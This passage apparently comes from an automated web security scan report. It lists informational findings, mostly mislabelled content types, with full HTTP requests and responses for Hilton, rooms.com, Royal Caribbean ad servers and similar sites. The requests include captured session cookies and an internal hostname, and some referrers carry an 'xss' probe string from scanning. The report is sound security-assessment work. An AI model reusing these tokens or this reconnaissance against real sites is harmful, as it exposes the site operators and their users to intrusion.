Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
24.28. http://www.hilton.com/en/hi/brand/about.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/brand/about.jhtml

Request

GET /en/hi/brand/about.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=UM1GHUXVYDE3SCSGBJBOD4Q; cross-sell=hi; mmcore.tst=0.056; mmid=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=1706281310%7CFAAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317640644129:ss=1317640644129

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 37539
Date: Mon, 03 Oct 2011 14:17:04 GMT
Connection: close
Vary: Accept-Encoding

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//
...[SNIP]...
24.29. http://www.hilton.com/en/hi/info/site_usage.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/info/site_usage.jhtml

Request

GET /en/hi/info/site_usage.jhtml HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635909366:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 67255
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:15 GMT
Connection: close

<!-- <SETVALUE PARAM="content_head" VALUE="`fileURL("home_head.jhtml")`"> -->

<!-- <SETVALUE PARAM="content_footer" VALUE="`fileURL("home_footer.jhtml")`"> -->


<!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
24.30. http://www.hilton.com/en/hi/promotions/hi_resorts/index.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hilton.com
Path:   /en/hi/promotions/hi_resorts/index.jhtml

Request

GET /en/hi/promotions/hi_resorts/index.jhtml?cid=OM,HH,Resorts,Offer HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; mmcore.tst=0.263; mmid=1806537735%7CCAAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=1806537735%7CCAAAAAodekFwyAYAAA%3D%3D; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635892352:ss=1317635584777

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 426
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:57:56 GMT
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you reque
...[SNIP]...
24.31. http://www.rooms.com/includes/sidebars/ob-search-collateral/PopupCalendar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms.com
Path:   /includes/sidebars/ob-search-collateral/PopupCalendar.html

Request

GET /includes/sidebars/ob-search-collateral/PopupCalendar.html HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.1.10.1317645735; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 6118
Content-Type: text/html
Last-Modified: Thu, 10 Feb 2011 19:37:08 GMT
Accept-Ranges: bytes
ETag: "829090e759c9cb1:5853"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:19 GMT
Content-Length: 6118

<!--
$Header: /WebSites/affiliate/includes/sidebars/ob-search-collateral/PopupCalendar.html 2 2/08/11 8:54p Sampsonm $
AUTHOR: Orbitz
CREATED: 1/20/2011 with transition to Orbitz land
PURPOS
...[SNIP]...
25. Content type incorrectly stated  previous  next
There are 44 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/RoyalCaribbean/ZAP/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18883
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
25.2. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/RoyalCaribbean/ZAP/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18883
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
25.3. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/RoyalCaribbean/ZAP/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
25.4. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/RoyalCaribbean/ZAP/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
25.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /2/RoyalCaribbean/ZAP/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 18884
Content-Type: text/html

/* ZAP Lightning Bolt File v7 - Nish Desai 20110820 */
function URLparser(str) {
var o = URLparser.options,
       m = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
       uri = {},
       i = 14;
...[SNIP]...
25.6. http://gs.instantservice.com/geoipAPI.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://gs.instantservice.com
Path:   /geoipAPI.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /geoipAPI.js?src=ii3&ts=1317646576 HTTP/1.1
Host: gs.instantservice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:56:13 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 355
Connection: close
Content-Type: text/javascript; charset=utf-8

isgeoipapi_continent_code = "NA";isgeoipapi_country_code = "US";isgeoipapi_country_name = "United States";isgeoipapi_region = "TX";isgeoipapi_city = "Dallas";isgeoipapi_dma_code = "623";isgeoipapi_are
...[SNIP]...
25.7. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_850.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipinvite.iperceptions.com
Path:   /Invitations/Javascripts/ip_Layer_Invitation_850.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/ip_Layer_Invitation_850.aspx HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 03 Oct 2011 12:46:36 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR11
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_850.js';var script = document.createElement('script'); script.setA
...[SNIP]...
25.8. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/1338891380/x22/RGM/OPT_1x1.jpg_950x35/1x1-4.jpg/4d686437616b356934616b41434d6658  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc18005.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/1338891380/x22/RGM/OPT_1x1.jpg_950x35/1x1-4.jpg/4d686437616b356934616b41434d6658

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/1338891380/x22/RGM/OPT_1x1.jpg_950x35/1x1-4.jpg/4d686437616b356934616b41434d6658? HTTP/1.1
Host: oasc18005.247realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/adpanelcontent247.aspx?m=0&page=home_aspx&pagetype=HOME&adtype=INTEGRATEDHEADER
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; NXCLICK2=011RAUw5NX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d18efm_qppm_iuuq=ffffffff09419e6945525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 14:21:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 43

GIF89a.............!.......,...........L..;
25.9. http://oasc18005.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/92427839/Position1/RGM/OPT_1x1.jpg_980x65/1x1-5.jpg/4d686437616b356934616b41434d6658  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc18005.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/92427839/Position1/RGM/OPT_1x1.jpg_980x65/1x1-5.jpg/4d686437616b356934616b41434d6658

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /RealMedia/ads/adstream_lx.ads/www.opentable.opt/home/L22/92427839/Position1/RGM/OPT_1x1.jpg_980x65/1x1-5.jpg/4d686437616b356934616b41434d6658? HTTP/1.1
Host: oasc18005.247realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/adpanelcontent247.aspx?m=0&page=home_aspx&pagetype=HOME&adtype=FLOATINGFOOTER
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; NXCLICK2=011RAUw5NX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d18efm_qppm_iuuq=ffffffff09419e6945525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 14:21:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Type: image/jpeg
Content-Length: 43

GIF89a.............!.......,...........L..;
25.10. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrack&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:54:46 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 97
Date: Mon, 03 Oct 2011 12:54:46 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrack',0).setOffer(new mboxOfferDefault()).loaded();
25.11. https://secure.hilton.com/en/hhonors/css/basic.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hhonors/css/basic.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /en/hhonors/css/basic.css HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.960; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635943626:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Length: 4000
Content-Type: text/css
ETag: "827c2fcf-1-0-fa0"
Last-Modified: Thu, 11 Nov 2010 09:36:11 GMT
Accept-Ranges: bytes
Cache-Control: max-age=122706
Expires: Tue, 04 Oct 2011 23:04:00 GMT
Date: Mon, 03 Oct 2011 12:58:54 GMT
Connection: keep-alive

/* main content
---------------------------

#content {
   clear: left;
   background: transparent url(/brand/hh/media/images/bg/bg_main.gif) repeat-y top left;
   color: inherit;
   width: 994px;
   text-alig
...[SNIP]...
25.12. http://vacations.rooms.com/caux/html/tracking.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /caux/html/tracking.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /caux/html/tracking.js HTTP/1.1
Host: vacations.rooms.com
